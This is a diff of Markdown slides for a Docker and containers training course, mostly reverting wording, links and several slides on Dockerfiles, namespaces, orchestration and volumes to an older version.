slides/containers/Compose_For_Dev_Stacks.md

@@ -78,7 +78,7 @@ First step: clone the source code for the app we will be working on.
 
 ```bash
 $ cd
-$ git clone https://github.com/jpetazzo/trainingwheels
+$ git clone git://github.com/jpetazzo/trainingwheels
 ...
 $ cd trainingwheels
 ```

slides/containers/Container_Engines.md

@@ -67,8 +67,7 @@ The following list is not exhaustive.
 
 Furthermore, we limited the scope to Linux containers.
 
-We can also find containers (or things that look like containers) on other platforms
-like Windows, macOS, Solaris, FreeBSD ...
+Containers also exist (sometimes with other names) on Windows, macOS, Solaris, FreeBSD ...
 
 ---
 
@@ -86,7 +85,7 @@ like Windows, macOS, Solaris, FreeBSD ...
 
 * No notion of image (container filesystems have to be managed manually).
 
-* Networking has to be set up manually.
+* Networking has to be setup manually.
 
 ---
 
@@ -112,7 +111,7 @@ like Windows, macOS, Solaris, FreeBSD ...
 
 * Strong emphasis on security (through privilege separation).
 
-* Networking has to be set up separately (e.g. through CNI plugins).
+* Networking has to be setup separately (e.g. through CNI plugins).
 
 * Partial image management (pull, but no push).
 
@@ -152,37 +151,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
 
 * Basic image support (tar archives and raw disk images).
 
-* Network has to be set up manually.
-
----
-
-## Kata containers
-
-* OCI-compliant runtime.
-
-* Fusion of two projects: Intel Clear Containers and Hyper runV.
-
-* Run each container in a lightweight virtual machine.
-
-* Requires running on bare metal *or* with nested virtualization.
-
----
-
-## gVisor
-
-* OCI-compliant runtime.
-
-* Implements a subset of the Linux kernel system calls.
-
-* Written in go, uses a smaller subset of system calls.
-
-* Can be heavily sandboxed.
-
-* Can run in two modes:
-
-  * KVM (requires bare metal or nested virtualization),
-
-  * ptrace (no requirement, but slower).
+* Network has to be setup manually.
 
 ---
 
@@ -205,3 +174,4 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
   - Docker is a good default choice
 
   - If you use Kubernetes, the engine doesn't matter
+

slides/containers/Container_Network_Model.md

@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.
 
 * `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
 
-* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
+* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
 
 ---
 
@@ -528,9 +528,7 @@ Very short instructions:
 - `docker network create mynet --driver overlay`
 - `docker service create --network mynet myimage`
 
-If you want to learn more about Swarm mode, you can check
-[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
-or [these slides](https://container.training/swarm-selfpaced.yml.html).
+See http://jpetazzo.github.io/container.training for all the deets about clustering!
 
 ---
 
@@ -556,7 +554,7 @@ General idea:
 
 * So far, we have specified which network to use when starting the container.
 
-* The Docker Engine also allows connecting and disconnecting while the container is running.
+* The Docker Engine also allows to connect and disconnect while the container runs.
 
 * This feature is exposed through the Docker API, and through two Docker CLI commands:
 
@@ -723,20 +721,3 @@ eth0      Link encap:Ethernet  HWaddr 02:42:AC:15:00:03
 ...
 ```
 ]
-
----
-
-class: extra-details
-
-## Building with a custom network
-
-* We can build a Dockerfile with a custom network with `docker build --network NAME`.
-
-* This can be used to check that a build doesn't access the network.
-
-  (But keep in mind that most Dockerfiles will fail,
-  <br/>because they need to install remote packages and dependencies!)
-
-* This may be used to access an internal package repository.
-
-  (But try to use a multi-stage build instead, if possible!)

slides/containers/Dockerfile_Tips.md

@@ -76,78 +76,6 @@ CMD ["python", "app.py"]
 
 ---
 
-## Be careful with `chown`, `chmod`, `mv`
-
-* Layers cannot store efficiently changes in permissions or ownership.
-
-* Layers cannot represent efficiently when a file is moved either.
-
-* As a result, operations like `chown`, `chown`, `mv` can be expensive.
-
-* For instance, in the Dockerfile snippet below, each `RUN` line
-  creates a layer with an entire copy of `some-file`.
-
-  ```dockerfile
-  COPY some-file .
-  RUN chown www-data:www-data some-file
-  RUN chmod 644 some-file
-  RUN mv some-file /var/www
-  ```
-
-* How can we avoid that?
-
----
-
-## Put files on the right place
-
-* Instead of using `mv`, directly put files at the right place.
-
-* When extracting archives (tar, zip...), merge operations in a single layer.
-
-  Example:
-
-  ```dockerfile
-    ...
-    RUN wget http://.../foo.tar.gz \
-     && tar -zxf foo.tar.gz \
-     && mv foo/fooctl /usr/local/bin \
-     && rm -rf foo
-  ...
-  ```
-
----
-
-## Use `COPY --chown`
-
-* The Dockerfile instruction `COPY` can take a `--chown` parameter.
-
-  Examples:
-
-  ```dockerfile
-  ...
-  COPY --chown=1000 some-file .
-  COPY --chown=1000:1000 some-file .
-  COPY --chown=www-data:www-data some-file .
-  ```
-
-* The `--chown` flag can specify a user, or a user:group pair.
-
-* The user and group can be specified as names or numbers.
-
-* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
-
-  *(In the container, not on the host!)*
-
----
-
-## Set correct permissions locally
-
-* Instead of using `chmod`, set the right file permissions locally.
-
-* When files are copied with `COPY`, permissions are preserved.
-
----
-
 ## Embedding unit tests in the build process
 
 ```dockerfile

slides/containers/Ecosystem.md

@@ -169,5 +169,5 @@ Would we give the same answers to the questions on the previous slide?
 
 class: pic
 
-![Cloud Native Landscape](https://landscape.cncf.io/images/landscape.png)
+![Cloud Native Landscape](https://raw.githubusercontent.com/cncf/landscape/master/landscape/CloudNativeLandscape_latest.png)
 

slides/containers/Exercise_Composefile.md

@@ -1,5 +0,0 @@
-# Exercise — writing a Compose file
-
-Let's write a Compose file for the wordsmith app!
-
-The code is at: https://github.com/jpetazzo/wordsmith

slides/containers/Exercise_Dockerfile_Advanced.md

@@ -1,9 +0,0 @@
-# Exercise — writing better Dockerfiles
-
-Let's update our Dockerfiles to leverage multi-stage builds!
-
-The code is at: https://github.com/jpetazzo/wordsmith
-
-Use a different tag for these images, so that we can compare their sizes.
-
-What's the size difference between single-stage and multi-stage builds?

slides/containers/Exercise_Dockerfile_Basic.md

@@ -1,5 +0,0 @@
-# Exercise — writing Dockerfiles
-
-Let's write Dockerfiles for an existing application!
-
-The code is at: https://github.com/jpetazzo/wordsmith

slides/containers/First_Containers.md

@@ -203,90 +203,4 @@ bash: figlet: command not found
 
 * The basic Ubuntu image was used, and `figlet` is not here.
 
----
-
-## Where's my container?
-
-* Can we reuse that container that we took time to customize?
-
-  *We can, but that's not the default workflow with Docker.*
-
-* What's the default workflow, then?
-
-  *Always start with a fresh container.*
-  <br/>
-  *If we need something installed in our container, build a custom image.*
-
-* That seems complicated!
-
-  *We'll see that it's actually pretty easy!*
-
-* And what's the point?
-
-  *This puts a strong emphasis on automation and repeatability. Let's see why ...*
-
----
-
-## Pets vs. Cattle
-
-* In the "pets vs. cattle" metaphor, there are two kinds of servers.
-
-* Pets:
-
-  * have distinctive names and unique configurations
-
-  * when they have an outage, we do everything we can to fix them
-
-* Cattle:
-
-  * have generic names (e.g. with numbers) and generic configuration
-
-  * configuration is enforced by configuration management, golden images ...
-
-  * when they have an outage, we can replace them immediately with a new server
-
-* What's the connection with Docker and containers?
-
----
-
-## Local development environments
-
-* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
-
-  * create VM from base template (Ubuntu, CentOS...)
-
-  * install packages, set up environment
-
-  * work on project
-
-  * when done, shut down VM
-
-  * next time we need to work on project, restart VM as we left it
-
-  * if we need to tweak the environment, we do it live
-
-* Over time, the VM configuration evolves, diverges.
-
-* We don't have a clean, reliable, deterministic way to provision that environment.
-
----
-
-## Local development with Docker
-
-* With Docker, the workflow looks like this:
-
-  * create container image with our dev environment
-
-  * run container with that image
-
-  * work on project
-
-  * when done, shut down container
-
-  * next time we need to work on project, start a new container
-
-  * if we need to tweak the environment, we create a new image
-
-* We have a clear definition of our environment, and can share it reliably with others.
-
-* Let's see in the next chapters how to bake a custom image with `figlet`!
+* We will see in the next chapters how to bake a custom image with `figlet`.

slides/containers/Initial_Images.md

@@ -66,21 +66,6 @@ class: pic
 
 ---
 
-## Differences between containers and images
-
-* An image is a read-only filesystem.
-
-* A container is an encapsulated set of processes,
-
-  running in a read-write copy of that filesystem.
-
-* To optimize container boot time, *copy-on-write* is used
-  instead of regular copy.
-
-* `docker run` starts a container from a given image.
-
----
-
 class: pic
 
 ## Multiple containers sharing the same image
@@ -89,6 +74,20 @@ class: pic
 
 ---
 
+## Differences between containers and images
+
+* An image is a read-only filesystem.
+
+* A container is an encapsulated set of processes running in a
+  read-write copy of that filesystem.
+
+* To optimize container boot time, *copy-on-write* is used
+  instead of regular copy.
+
+* `docker run` starts a container from a given image.
+
+---
+
 ## Comparison with object-oriented programming
 
 * Images are conceptually similar to *classes*.
@@ -119,7 +118,7 @@ If an image is read-only, how do we change it?
 
 * The only way to create an image is by "freezing" a container.
 
-* The only way to create a container is by instantiating an image.
+* The only way to create a container is by instanciating an image.
 
 * Help!
 
@@ -178,11 +177,8 @@ Let's explain each of them.
 
 ## Root namespace
 
-The root namespace is for official images.
-
-They are gated by Docker Inc.
-
-They are generally authored and maintained by third parties.
+The root namespace is for official images. They are put there by Docker Inc.,
+but they are generally authored and maintained by third parties.
 
 Those images include:
 
@@ -192,7 +188,7 @@ Those images include:
 
 * Ready-to-use components and services, like redis, postgresql...
 
-* Over 150 at this point!
+* Over 130 at this point!
 
 ---
 
@@ -220,7 +216,7 @@ clock
 
 ---
 
-## Self-hosted namespace
+## Self-Hosted namespace
 
 This namespace holds images which are not hosted on Docker Hub, but on third
 party registries.
@@ -237,13 +233,6 @@ localhost:5000/wordpress
 * `localhost:5000` is the host and port of the registry
 * `wordpress` is the name of the image
 
-Other examples:
-
-```bash
-quay.io/coreos/etcd
-gcr.io/google-containers/hugo
-```
-
 ---
 
 ## How do you store and manage images?
@@ -363,8 +352,6 @@ Do specify tags:
 * To ensure that the same version will be used everywhere.
 * To ensure repeatability later.
 
-This is similar to what we would do with `pip install`, `npm install`, etc.
-
 ---
 
 ## Section summary

slides/containers/Installing_Docker.md

@@ -38,7 +38,11 @@ We can arbitrarily distinguish:
 
 ## Installing Docker on Linux
 
-* The recommended method is to install the packages supplied by Docker Inc :
+* The recommended method is to install the packages supplied by Docker Inc.:
+
+  https://store.docker.com
+
+* The general method is:
 
   - add Docker Inc.'s package repositories to your system configuration
 
@@ -52,12 +56,6 @@ We can arbitrarily distinguish:
 
   https://docs.docker.com/engine/installation/linux/docker-ce/binaries/
 
-* To quickly setup a dev environment, Docker provides a convenience install script:
-
-  ```bash
-  curl -fsSL get.docker.com | sh
-  ```
-
 ---
 
 class: extra-details
@@ -84,11 +82,11 @@ class: extra-details
 
 ## Installing Docker on macOS and Windows
 
-* On macOS, the recommended method is to use Docker Desktop for Mac:
+* On macOS, the recommended method is to use Docker for Mac:
 
   https://docs.docker.com/docker-for-mac/install/
 
-* On Windows 10 Pro, Enterprise, and Education, you can use Docker Desktop for Windows:
+* On Windows 10 Pro, Enterprise, and Education, you can use Docker for Windows:
 
   https://docs.docker.com/docker-for-windows/install/
 
@@ -102,7 +100,7 @@ class: extra-details
 
 ---
 
-## Docker Desktop for Mac and Docker Desktop for Windows
+## Docker for Mac and Docker for Windows
 
 * Special Docker Editions that integrate well with their respective host OS
 

slides/containers/Local_Development_Workflow.md

@@ -156,7 +156,7 @@ Option 3:
 
 * Use a *volume* to mount local files into the container
 * Make changes locally
-* Changes are reflected in the container
+* Changes are reflected into the container
 
 ---
 
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
 
 * `namer` is the name of the image we will run.
 
-* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
+* We don't specify a command to run because it is already set in the Dockerfile.
 
 Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
 
@@ -192,7 +192,7 @@ The flag structure is:
 [host-path]:[container-path]:[rw|ro]
 ```
 
-* `[host-path]` and `[container-path]` are created if they don't exist.
+* If `[host-path]` or `[container-path]` doesn't exist it is created.
 
 * You can control the write status of the volume with the `ro` and
   `rw` options.
@@ -255,13 +255,13 @@ color: red;
 
 * Volumes are *not* copying or synchronizing files between the host and the container.
 
-* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
+* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
 
 * Bind mounts are *kind of* similar to symbolic links, but at a very different level.
 
 * Changes made on the host or on the container will be visible on the other side.
 
-  (Under the hood, it's the same file anyway.)
+  (Since under the hood, it's the same file on both anyway.)
 
 ---
 
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
 
 --
 
-* Let's majorly mess up our container.
+* Let's mess up majorly with our container.
 
   (Remove files or whatever.)
 
@@ -319,7 +319,7 @@ and *canary deployments*.
    <br/>
    Use the `-v` flag to mount our source code inside the container.
 
-3. Edit the source code outside the container, using familiar tools.
+3. Edit the source code outside the containers, using regular tools.
    <br/>
    (vim, emacs, textmate...)
 

slides/containers/Logging.md

@@ -194,13 +194,9 @@ will have equal success with Fluent or other logging stacks!*
 
 - We are going to use a Compose file describing the ELK stack.
 
-- The Compose file is in the container.training repository on GitHub.
-
 ```bash
-$ git clone https://github.com/jpetazzo/container.training
-$ cd container.training
-$ cd elk
-$ docker-compose up
+$ cd ~/container.training/stacks
+$ docker-compose -f elk.yml up -d
 ```
 
 - Let's have a look at the Compose file while it's deploying.
@@ -295,4 +291,4 @@ that you don't drop messages on the floor. Good luck.
 
 If you want to learn more about the GELF driver,
 have a look at [this blog post](
-https://jpetazzo.github.io/2017/01/20/docker-logging-gelf/).
+http://jpetazzo.github.io/2017/01/20/docker-logging-gelf/).

slides/containers/Multi_Stage_Builds.md

@@ -293,23 +293,3 @@ We can achieve even smaller images if we use smaller base images.
 However, if we use common base images (e.g. if we standardize on `ubuntu`),
 these common images will be pulled only once per node, so they are
 virtually "free."
-
----
-
-## Build targets
-
-* We can also tag an intermediary stage with `docker build --target STAGE --tag NAME`
-
-* This will create an image (named `NAME`) corresponding to stage `STAGE`
-
-* This can be used to easily access an intermediary stage for inspection
-
-  (Instead of parsing the output of `docker build` to find out the image ID)
-
-* This can also be used to describe multiple images from a single Dockerfile
-
-  (Instead of using multiple Dockerfiles, which could go out of sync)
-
-* Sometimes, we want to inspect a specific intermediary build stage.
-
-* Or, we want to describe multiple images using a single Dockerfile.

slides/containers/Namespaces_Cgroups.md

@@ -86,13 +86,13 @@ class: extra-details, deep-dive
 
   - the `unshare()` system call.
 
-- The Linux tool `unshare` allows doing that from a shell.
+- The Linux tool `unshare` allows to do that from a shell.
 
 - A new process can re-use none / all / some of the namespaces of its parent.
 
 - It is possible to "enter" a namespace with the `setns()` system call.
 
-- The Linux tool `nsenter` allows doing that from a shell.
+- The Linux tool `nsenter` allows to do that from a shell.
 
 ---
 
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
 
 - gethostname / sethostname
 
-- Allows setting a custom hostname for a container.
+- Allows to set a custom hostname for a container.
 
 - That's (mostly) it!
 
-- Also allows setting the NIS domain.
+- Also allows to set the NIS domain.
 
   (If you don't know what a NIS domain is, you don't have to worry about it!)
 
@@ -392,13 +392,13 @@ class: extra-details
 
 - Processes can have their own root fs (à la chroot).
 
-- Processes can also have "private" mounts. This allows:
+- Processes can also have "private" mounts. This allows to:
 
-  - isolating `/tmp` (per user, per service...)
+  - isolate `/tmp` (per user, per service...)
 
-  - masking `/proc`, `/sys` (for processes that don't need them)
+  - mask `/proc`, `/sys` (for processes that don't need them)
 
-  - mounting remote filesystems or sensitive data,
+  - mount remote filesystems or sensitive data,
     <br/>but make it visible only for allowed processes
 
 - Mounts can be totally private, or shared.
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
 
 ## User namespace
 
-- Allows mapping UID/GID; e.g.:
+- Allows to map UID/GID; e.g.:
 
   - UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
   - UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
@@ -947,7 +947,7 @@ Killed
 
   (i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
 
-- Allows setting relative weights used by the scheduler.
+- Allows to set relative weights used by the scheduler.
 
 ---
 
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
 
 - Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
 
-- The seccomp-bpf extension allows specifying custom filters with BPF rules.
+- The seccomp-bpf extension allows to specify custom filters with BPF rules.
 
-- This allows filtering by syscall, and by parameter.
+- This allows to filter by syscall, and by parameter.
 
 - BPF code can perform arbitrarily complex checks, quickly, and safely.
 

slides/containers/Orchestration_Overview.md

@@ -6,6 +6,8 @@ In this chapter, we will:
 
 * Present (from a high-level perspective) some orchestrators.
 
+* Show one orchestrator (Kubernetes) in action.
+
 ---
 
 class: pic
@@ -119,7 +121,7 @@ Now, how are things for our IAAS provider?
 - Solution: *migrate* VMs and shutdown empty servers
   
   (e.g. combine two hypervisors with 40% load into 80%+0%,
-  <br/>and shut down the one at 0%)
+  <br/>and shutdown the one at 0%)
 
 ---
 
@@ -127,7 +129,7 @@ Now, how are things for our IAAS provider?
 
 How do we implement this?
 
-- Shut down empty hosts (but keep some spare capacity)
+- Shutdown empty hosts (but keep some spare capacity)
 
 - Start hosts again when capacity gets low
 
@@ -153,7 +155,7 @@ processes or data flows are given access to system resources.*
 
 The scheduler is concerned mainly with:
 
-- throughput (total amount of work done per time unit);
+- throughput (total amount or work done per time unit);
 - turnaround time (between submission and completion);
 - response time (between submission and start);
 - waiting time (between job readiness and execution);
@@ -175,7 +177,7 @@ In practice, these goals often conflict.
 
   - 16 GB RAM, 8 cores, 1 TB disk
 
-- Each week, your team requests:
+- Each week, your team asks:
 
   - one VM with X RAM, Y CPU, Z disk
 
@@ -241,76 +243,58 @@ Scheduling = deciding which hypervisor to use for each VM.
 
 ---
 
-class: pic
-
 ## Scheduling with one resource
 
 .center[![Not-so-good bin packing](images/binpacking-1d-1.gif)]
 
-## We can't fit a job of size 6 :(
+Can we do better?
 
 ---
 
-class: pic
-
 ## Scheduling with one resource
 
 .center[![Better bin packing](images/binpacking-1d-2.gif)]
 
-## ... Now we can!
+Yup!
 
 ---
 
-class: pic
-
 ## Scheduling with two resources
 
 .center[![2D bin packing](images/binpacking-2d.gif)]
 
 ---
 
-class: pic
-
 ## Scheduling with three resources
 
 .center[![3D bin packing](images/binpacking-3d.gif)]
 
 ---
 
-class: pic
-
 ## You need to be good at this
 
 .center[![Tangram](images/tangram.gif)]
 
 ---
 
-class: pic
-
 ## But also, you must be quick!
 
 .center[![Tetris](images/tetris-1.png)]
 
 ---
 
-class: pic
-
 ## And be web scale!
 
 .center[![Big tetris](images/tetris-2.gif)]
 
 ---
 
-class: pic
-
 ## And think outside (?) of the box!
 
 .center[![3D tetris](images/tetris-3.png)]
 
 ---
 
-class: pic
-
 ## Good luck!
 
 .center[![FUUUUUU face](images/fu-face.jpg)]
@@ -388,7 +372,7 @@ It depends on:
 
   (Marathon = long running processes; Chronos = run at intervals; ...)
 
-- Commercial offering through DC/OS by Mesosphere.
+- Commercial offering through DC/OS my Mesosphere.
 
 ---
 

slides/containers/Publishing_To_Docker_Hub.md

@@ -91,12 +91,12 @@ class: extra-details
 
 * We need a Dockerized repository!
 * Let's go to https://github.com/jpetazzo/trainingwheels and fork it.
-* Go to the Docker Hub (https://hub.docker.com/) and sign-in. Select "Repositories" in the blue navigation menu.
-* Select "Create" in the top-right bar, and select "Create Repository+".
+* Go to the Docker Hub (https://hub.docker.com/).
+* Select "Create" in the top-right bar, and select "Create Automated Build."
 * Connect your Docker Hub account to your GitHub account.
-* Click "Create" button.
-* Then go to "Builds" folder.
-* Click on Github icon and select your user and the repository that we just forked.
-* In "Build rules" block near page bottom, put `/www` in "Build Context" column (or whichever directory the Dockerfile is in).
-* Click "Save and Build" to build the repository immediately (without waiting for a git push).
+* Select your user and the repository that we just forked.
+* Create.
+* Then go to "Build Settings."
+* Put `/www` in "Dockerfile Location" (or whichever directory the Dockerfile is in).
+* Click "Trigger" to build the repository immediately (without waiting for a git push).
 * Subsequent builds will happen automatically, thanks to GitHub hooks.

slides/containers/Resource_Limits.md

@@ -72,7 +72,7 @@
 
 - For memory usage, the mechanism is part of the *cgroup* subsystem.
 
-- This subsystem allows limiting the memory for a process or a group of processes.
+- This subsystem allows to limit the memory for a process or a group of processes.
 
 - A container engine leverages these mechanisms to limit memory for a container.
 

slides/containers/Training_Environment.md

@@ -19,7 +19,7 @@ class: title
 
   - install Docker on e.g. a cloud VM
 
-  - use https://www.play-with-docker.com/ to instantly get a training environment
+  - use http://www.play-with-docker.com/ to instantly get a training environment
 
 ---
 
@@ -45,13 +45,13 @@ individual Docker VM.*
 
 - The Docker Engine is a daemon (a service running in the background).
 
-- This daemon manages containers, the same way that a hypervisor manages VMs.
+- This daemon manages containers, the same way that an hypervisor manages VMs.
 
 - We interact with the Docker Engine by using the Docker CLI.
 
 - The Docker CLI and the Docker Engine communicate through an API.
 
-- There are many other programs and client libraries which use that API.
+- There are many other programs, and many client libraries, to use that API.
 
 ---
 
@@ -91,7 +91,7 @@ $ ssh <login>@<ip-address>
 
   * Git BASH (https://git-for-windows.github.io/)
 
-  * MobaXterm (https://mobaxterm.mobatek.net/)
+  * MobaXterm (http://moabaxterm.mobatek.net)
 
 ---
 

slides/containers/Windows_Containers.md

@@ -119,9 +119,9 @@ Nano and LinuxKit VMs in Hyper-V!)
 
   - golang, mongo, python, redis, hello-world ... and more being added
 
-  - you should still use `--plaform` with multi-os images to be certain
+  - you should still use `--plaform` with multi-os images to be certain 
 
-- Windows Containers now support `localhost` accessible containers (July 2018)
+- Windows Containers now support `localhost` accessable containers (July 2018)
 
 - Microsoft (April 2018) added Hyper-V support to Windows 10 Home ...
 
@@ -135,8 +135,8 @@ Most "official" Docker images don't run on Windows yet.
 
 Places to Look:
 
-  - Hub Official: https://hub.docker.com/u/winamd64/
-
+  - Hub Official: https://hub.docker.com/u/winamd64/ 
+  
   - Microsoft: https://hub.docker.com/r/microsoft/
 
 ---
@@ -153,12 +153,12 @@ Places to Look:
 
 - PowerShell [Tab Completion: DockerCompletion](https://github.com/matt9ucci/DockerCompletion)
 
-- Best Shell GUI: [Cmder.net](https://cmder.net/)
+- Best Shell GUI: [Cmder.net](http://cmder.net/)
 
 - Good Windows Container Blogs and How-To's
 
-  - Docker DevRel [Elton Stoneman, Microsoft MVP](https://blog.sixeyed.com/)
+  - Dockers DevRel [Elton Stoneman, Microsoft MVP](https://blog.sixeyed.com/)
 
-  - Docker Captain [Nicholas Dille](https://dille.name/blog/)
+  - Docker Captian [Nicholas Dille](https://dille.name/blog/)
 
   - Docker Captain [Stefan Scherer](https://stefanscherer.github.io/) 

slides/containers/Working_With_Volumes.md

@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
 
 * Sharing a *single file* between the host and a container.
 
-* Using remote storage and custom storage with *volume drivers*.
+* Using remote storage and custom storage with "volume drivers".
 
 ---
 
 ## Volumes are special directories in a container
 
-Volumes can be declared in two different ways:
+Volumes can be declared in two different ways.
 
 * Within a `Dockerfile`, with a `VOLUME` instruction.
 
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
 
 * Volumes are used with the `-v` option.
 
-* When a host path does not contain a `/`, it is considered a volume name.
+* When a host path does not contain a /, it is considered to be a volume name.
 
 Let's start a web server using the two previous volumes.
 
@@ -189,7 +189,7 @@ $ curl localhost:1234
 
 * In this example, we will run a text editor in the other container.
 
-  (But this could be an FTP server, a WebDAV server, a Git receiver...)
+  (But this could be a FTP server, a WebDAV server, a Git receiver...)
 
 Let's start another container using the `webapps` volume.
 
@@ -401,7 +401,7 @@ or providing extra features. For instance:
 * [REX-Ray](https://rexray.io/) - create and manage volumes backed by an enterprise storage system (e.g.
   SAN or NAS), or by cloud block stores (e.g. EBS, EFS).
 
-* [Portworx](https://portworx.com/) - provides distributed block store for containers.
+* [Portworx](http://portworx.com/) - provides distributed block store for containers.
 
 * [Gluster](https://www.gluster.org/) - open source software-defined distributed storage that can scale
   to several petabytes. It provides interfaces for object, block and file storage.

slides/containers/intro.md

@@ -30,7 +30,7 @@ class: self-paced
 
 - These slides include *tons* of exercises and examples
 
-- They assume that you have access to a machine running Docker
+- They assume that you have acccess to a machine running Docker
 
 - If you are attending a workshop or tutorial:
   <br/>you will be given specific instructions to access a cloud VM

slides/docker-compose.yaml

@@ -1,16 +0,0 @@
-version: "2"
-
-services:
-  www:
-    image: nginx
-    volumes:
-    - .:/usr/share/nginx/html
-    ports:
-    - 80
-  builder:
-    build: .
-    volumes:
-    - ..:/repo
-    working_dir: /repo/slides
-    command: ./build.sh forever
-